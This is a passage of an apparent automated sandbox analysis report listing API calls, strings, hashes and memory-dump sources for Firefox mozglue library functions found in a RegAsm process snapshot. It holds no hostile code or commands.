                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C719EC8
                                                                                    • free.MOZGLUE(6C71946B,?,?,?), ref: 6C719EDF
                                                                                    • free.MOZGLUE(?,?,?,?), ref: 6C719EF5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                    • String ID:
                                                                                    • API String ID: 956590011-0
                                                                                    • Opcode ID: eb9e2caa80bd7aadcccb593515610985ff057c1de2e1e5162db7738baa1c60e6
                                                                                    • Instruction ID: fe201dd45fa612d9d2ded724f75e9b34d306b576844a32d07ddb4365bb4bae9d
                                                                                    • Opcode Fuzzy Hash: eb9e2caa80bd7aadcccb593515610985ff057c1de2e1e5162db7738baa1c60e6
                                                                                    • Instruction Fuzzy Hash: 0371A17190AB418BD712CF18C54055BF3F4FFA9315B44865EE89A9BB11EB30E886CBC5
                                                                                    APIs
                                                                                    • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE ref: 6C71DDCF
                                                                                      • Part of subcall function 6C6FFA00: ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6FFA4B
                                                                                      • Part of subcall function 6C7190E0: free.MOZGLUE(?,00000000,?,?,6C71DEDB), ref: 6C7190FF
                                                                                      • Part of subcall function 6C7190E0: free.MOZGLUE(?,00000000,?,?,6C71DEDB), ref: 6C719108
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C71DE0D
                                                                                    • free.MOZGLUE(00000000), ref: 6C71DE41
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C71DE5F
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C71DEA3
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C71DEE9
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C70DEFD,?,6C6D4A68), ref: 6C71DF32
                                                                                      • Part of subcall function 6C71DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C71DB86
                                                                                      • Part of subcall function 6C71DAE0: ??1MutexImpl@detail@mozilla@@QAE@XZ.MOZGLUE ref: 6C71DC0E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,6C70DEFD,?,6C6D4A68), ref: 6C71DF65
                                                                                    • free.MOZGLUE(?), ref: 6C71DF80
                                                                                      • Part of subcall function 6C6E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6E5EDB
                                                                                      • Part of subcall function 6C6E5E90: memset.VCRUNTIME140(ewrl,000000E5,?), ref: 6C6E5F27
                                                                                      • Part of subcall function 6C6E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6E5FB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalImpl@detail@mozilla@@MutexSection$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedEnterExclusiveLeaveLockProfileReleasememset
                                                                                    • String ID:
                                                                                    • API String ID: 112305417-0
                                                                                    • Opcode ID: 9c22471b1ff4433038e5b7b6a5774adfb0c39aebaa0ca28267d9b3eca51d4c33
                                                                                    • Instruction ID: a9b2ab7939a19b41583c3db68c4f6d1e51046b319bfbe1bf3b461f1ab91aa347
                                                                                    • Opcode Fuzzy Hash: 9c22471b1ff4433038e5b7b6a5774adfb0c39aebaa0ca28267d9b3eca51d4c33
                                                                                    • Instruction Fuzzy Hash: 4D511C726096009BD7129B18CA842AE737ABFB5309F5D012DD41A53F11D731F91ECF9A
                                                                                    APIs
                                                                                    • ?_Fiopen@std@@YAPAU_iobuf@@PB_WHH@Z.MSVCP140(?,00000001,00000040,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725D32
                                                                                    • ?getloc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QBE?AVlocale@2@XZ.MSVCP140(?,00000000,00000001,?,?,?,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725D62
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,?,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725D6D
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,?,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725D84
                                                                                    • ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(?,?,?,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725DA4
                                                                                    • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,?,?,?,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725DC9
                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C725DDB
                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(?,?,?,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725E00
                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,?,6C725C8C,?,6C6FE829), ref: 6C725E45
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Lockit@std@@$??0_??1_?getloc@?$basic_streambuf@Bid@locale@std@@D@std@@@std@@Facet_Fiopen@std@@Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterU?$char_traits@U_iobuf@@V42@@Vfacet@locale@2@Vlocale@2@abortstd::_
                                                                                    • String ID:
                                                                                    • API String ID: 2325513730-0
                                                                                    • Opcode ID: 790f294c923c446a6fb057cfd824f9d22ee4642197f32015eb2b93fa32267e54
                                                                                    • Instruction ID: 8542c35af589e2b232e35df1b824315ece26903998f885ed170efa4bda7600b6
                                                                                    • Opcode Fuzzy Hash: 790f294c923c446a6fb057cfd824f9d22ee4642197f32015eb2b93fa32267e54
                                                                                    • Instruction Fuzzy Hash: 18417F70B002049FCB00EF65D9D9AAE77B5AF89318F544079D50A9B795EB34EC05CF51
                                                                                    APIs
                                                                                    • VirtualAlloc.KERNEL32(00000000,00003000,00003000,00000004,?,?,?,6C6C31A7), ref: 6C6FCDDD
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                    • API String ID: 4275171209-2186867486
                                                                                    • Opcode ID: abc266a20bd9e11aabcaca49faa281ec195840b37d2d76864e8ccdeb009634f4
                                                                                    • Instruction ID: 49c85311d0ce21e04b8e13d31db6f05a22ab99fb100d9dca1c69b3d9b391719e
                                                                                    • Opcode Fuzzy Hash: abc266a20bd9e11aabcaca49faa281ec195840b37d2d76864e8ccdeb009634f4
                                                                                    • Instruction Fuzzy Hash: C231A7317412056BFB24BF758C45BAE7B77BF41728F208025F526ABAC0DB70E9028799
                                                                                    APIs
                                                                                      • Part of subcall function 6C6CF100: LoadLibraryW.KERNEL32(shell32,?,6C73D020), ref: 6C6CF122
                                                                                      • Part of subcall function 6C6CF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C6CF132
                                                                                    • moz_xmalloc.MOZGLUE(00000012), ref: 6C6CED50
                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C6CEDAC
                                                                                    • wcslen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,\Mozilla\Firefox\SkeletonUILock-,00000020,?,00000000), ref: 6C6CEDCC
                                                                                    • CreateFileW.KERNEL32 ref: 6C6CEE08
                                                                                    • free.MOZGLUE(00000000), ref: 6C6CEE27
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6C6CEE32
                                                                                      • Part of subcall function 6C6CEB90: moz_xmalloc.MOZGLUE(00000104), ref: 6C6CEBB5
                                                                                      • Part of subcall function 6C6CEB90: memset.VCRUNTIME140(00000000,00000000,00000104,?,?,6C6FD7F3), ref: 6C6CEBC3
                                                                                      • Part of subcall function 6C6CEB90: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,6C6FD7F3), ref: 6C6CEBD6
                                                                                    Strings
                                                                                    • \Mozilla\Firefox\SkeletonUILock-, xrefs: 6C6CEDC1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Filefreemoz_xmallocwcslen$AddressCreateLibraryLoadModuleNameProcmemset
                                                                                    • String ID: \Mozilla\Firefox\SkeletonUILock-
                                                                                    • API String ID: 1980384892-344433685
                                                                                    • Opcode ID: 81d322c84b66e8532b1bfacc6c29656b4358e94f51c27c47a8eaaa507bc31bb7
                                                                                    • Instruction ID: 0fb006274e641b137bf68fce6905b2f97353d896978d698d52049948bcd09adc
                                                                                    • Opcode Fuzzy Hash: 81d322c84b66e8532b1bfacc6c29656b4358e94f51c27c47a8eaaa507bc31bb7
                                                                                    • Instruction Fuzzy Hash: E9510171E052188BDB00DF68C8426EEB7F0EF5A358F04842DE8556B741E730A989C7EB
                                                                                    APIs
                                                                                    • ?HandleSpecialValues@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@@Z.MOZGLUE ref: 6C73A565
                                                                                      • Part of subcall function 6C73A470: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C73A4BE
                                                                                      • Part of subcall function 6C73A470: memcpy.VCRUNTIME140(?,?,00000000), ref: 6C73A4D6
                                                                                    • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE ref: 6C73A65B
                                                                                    • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C73A6B6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
                                                                                    • String ID: 0$z
                                                                                    • API String ID: 310210123-2584888582
                                                                                    • Opcode ID: 6af208276d9daad829f9495ea0690de8443ec4c5a5fd384e0b949efa6d9e5a01
                                                                                    • Instruction ID: ac6873dc3ff4a9e8bd673f330469c39a64385e16bfc21c4e11b86ab3e268a377
                                                                                    • Opcode Fuzzy Hash: 6af208276d9daad829f9495ea0690de8443ec4c5a5fd384e0b949efa6d9e5a01
                                                                                    • Instruction Fuzzy Hash: EA414771A08745DFC741DF28C080A9BBBE5BF89354F409A2EF49987651EB30E549CB83
                                                                                    APIs
                                                                                    • free.MOZGLUE(?,6C74008B), ref: 6C6C7B89
                                                                                    • free.MOZGLUE(?,6C74008B), ref: 6C6C7BAC
                                                                                      • Part of subcall function 6C6C78C0: free.MOZGLUE(?,6C74008B), ref: 6C6C7BCF
                                                                                    • free.MOZGLUE(?,6C74008B), ref: 6C6C7BF2
                                                                                      • Part of subcall function 6C6E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C6E5EDB
                                                                                      • Part of subcall function 6C6E5E90: memset.VCRUNTIME140(ewrl,000000E5,?), ref: 6C6E5F27
                                                                                      • Part of subcall function 6C6E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C6E5FB2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$CriticalSection$EnterLeavememset
                                                                                    • String ID:
                                                                                    • API String ID: 3977402767-0
                                                                                    • Opcode ID: b4d6034e32a1f04dba8e311a155b7367edfa8b5a5c2e0414825c00c6c64aa934
                                                                                    • Instruction ID: 39109fef0bb5167b26b3eb41e6dd589597eac2570e95687e1c98ba8fbb46e1b6
                                                                                    • Opcode Fuzzy Hash: b4d6034e32a1f04dba8e311a155b7367edfa8b5a5c2e0414825c00c6c64aa934
                                                                                    • Instruction Fuzzy Hash: D5C19531F011188BEB248B68CC90BDDB7B2EF41318F1543A9D51AA7BC1D731AE858F5A
                                                                                    APIs
                                                                                      • Part of subcall function 6C6FAB89: EnterCriticalSection.KERNEL32(6C74E370,?,?,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284), ref: 6C6FAB94
                                                                                      • Part of subcall function 6C6FAB89: LeaveCriticalSection.KERNEL32(6C74E370,?,6C6C34DE,6C74F6CC,?,?,?,?,?,?,?,6C6C3284,?,?,6C6E56F6), ref: 6C6FABD1
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C6D4A68), ref: 6C70945E
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C709470
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C709482
                                                                                    • __Init_thread_footer.LIBCMT ref: 6C70949F
                                                                                    Strings
                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C70946B
                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C709459
                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C70947D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                    • API String ID: 4042361484-1628757462
                                                                                    • Opcode ID: 10e3591c2ff1d90fa00dfb75ea5111442733e4ded0c8305b628d6a2cc9420bce
                                                                                    • Instruction ID: facb988fc142b7d264b10e87858d2f1d9df4c6e72f0fee8a6b7bd3442cb6a2e7
                                                                                    • Opcode Fuzzy Hash: 10e3591c2ff1d90fa00dfb75ea5111442733e4ded0c8305b628d6a2cc9420bce
                                                                                    • Instruction Fuzzy Hash: 0201D4B0B0010187D710BBACDE11A5733F5AB0637EF058537F92A86B51EA31E9698A5B
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C710F6B
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C710F88
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C710FF7
                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C711067
                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C7110A7
                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C71114B
                                                                                      • Part of subcall function 6C708AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C721563), ref: 6C708BD5
                                                                                    • free.MOZGLUE(?), ref: 6C711174
                                                                                    • free.MOZGLUE(?), ref: 6C711186
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                    • String ID:
                                                                                    • API String ID: 2803333873-0
                                                                                    • Opcode ID: 045ae78a319b1adf2e66128807d29f986d4c708f1bd8837089a66281241a7c26
                                                                                    • Instruction ID: 828a74311b3306180e88f1b2284eb4147773e557c4c08759e4a640388864826d
                                                                                    • Opcode Fuzzy Hash: 045ae78a319b1adf2e66128807d29f986d4c708f1bd8837089a66281241a7c26
                                                                                    • Instruction Fuzzy Hash: 55610775A083448FCB10DF25CA8879AB7F5BFD5318F08892DE89947B11EB31E449CB41
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,6C6D1999), ref: 6C6CEA39
                                                                                    • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C6CEA5C
                                                                                    • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C6CEA76
                                                                                    • moz_xmalloc.MOZGLUE(-00000001,?,?,6C6D1999), ref: 6C6CEA9D
                                                                                    • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C6D1999), ref: 6C6CEAC2
                                                                                    • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C6CEADC
                                                                                    • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C6CEB0B
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C6CEB27
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                    • String ID:
                                                                                    • API String ID: 706364981-0
                                                                                    • Opcode ID: 3264a240e754e35a60ce86c2094059bf8c7255f1ab4f08cd6840419b1a73f060
                                                                                    • Instruction ID: dc29a9a766a99431cba0248a7c063fcae1f662c01b7481d256c44f08bcdb1ab6
                                                                                    • Opcode Fuzzy Hash: 3264a240e754e35a60ce86c2094059bf8c7255f1ab4f08cd6840419b1a73f060
                                                                                    • Instruction Fuzzy Hash: 7441F7B1A002259FDB14CFA8CC85AAE77B4FF55358F240629E815DB794E730EA04C7DA
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,6C6CB61E,?,?,?,?,?,00000000), ref: 6C6CB6AC
                                                                                      • Part of subcall function 6C6DCA10: malloc.MOZGLUE(?), ref: 6C6DCA26
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C6CB61E,?,?,?,?,?,00000000), ref: 6C6CB6D1
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C6CB61E,?,?,?,?,?,00000000), ref: 6C6CB6E3
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C6CB61E,?,?,?,?,?,00000000), ref: 6C6CB70B
                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C6CB61E,?,?,?,?,?,00000000), ref: 6C6CB71D
                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C6CB61E), ref: 6C6CB73F
                                                                                    • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C6CB61E,?,?,?,?,?,00000000), ref: 6C6CB760
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C6CB61E,?,?,?,?,?,00000000), ref: 6C6CB79A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                    • String ID:
                                                                                    • API String ID: 1394714614-0
                                                                                    • Opcode ID: 895619489ffa1f42e80b7baba8e3748bb0b338832fa2e9257a17c3502b78bcbe
                                                                                    • Instruction ID: f580b6f230f0940ba4dc1eab0e31ae6e430072d48255c1d60596c08ece28c6e6
                                                                                    • Opcode Fuzzy Hash: 895619489ffa1f42e80b7baba8e3748bb0b338832fa2e9257a17c3502b78bcbe
                                                                                    • Instruction Fuzzy Hash: 8141B6B2E001259FCB04DF68DC445AEB7B5FB85324F250669E825E7780D731A91487E6
                                                                                    APIs
                                                                                    • moz_xmalloc.MOZGLUE(6C745104), ref: 6C6CEFAC
                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6CEFD7
                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6CEFEC
                                                                                    • free.MOZGLUE(?), ref: 6C6CF00C
                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6CF02E
                                                                                    • memcpy.VCRUNTIME140(00000000,?), ref: 6C6CF041
                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6CF065
                                                                                    • moz_xmalloc.MOZGLUE ref: 6C6CF072
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000003.00000002.2046911307.000000006C6C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C6C0000, based on PE: true
                                                                                    • Associated: 00000003.00000002.2046895787.000000006C6C0000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047049118.000000006C73D000.00000002.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047081265.000000006C74E000.00000004.00000001.01000000.00000008.sdmp
                                                                                    • Associated: 00000003.00000002.2047103136.000000006C752000.00000002.00000001.01000000.00000008.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_3_2_6c6c0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                    • String ID:
                                                                                    • API String ID: 1148890222-0
                                                                                    • Opcode ID: cfc4cc09cb737282d68313a7a5795b1e2f095bb1c4eb13743921b18955cbeee3
                                                                                    • Instruction ID: 0527657a363f75e0e66b95967c99d1b8cdd16ae7d407dc8bf92d4adfb45dd790
                                                                                    • Opcode Fuzzy Hash: cfc4cc09cb737282d68313a7a5795b1e2f095bb1c4eb13743921b18955cbeee3
                                                                                    • Instruction Fuzzy Hash: DA4116B1B002159FCB08CF68DC959AE7365FF85318B24022DE826CB794EB31E905C7E6
                                                                                    APIs
                                                                                    • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C73B5B9
                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C73B5C5
                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C73B5DA
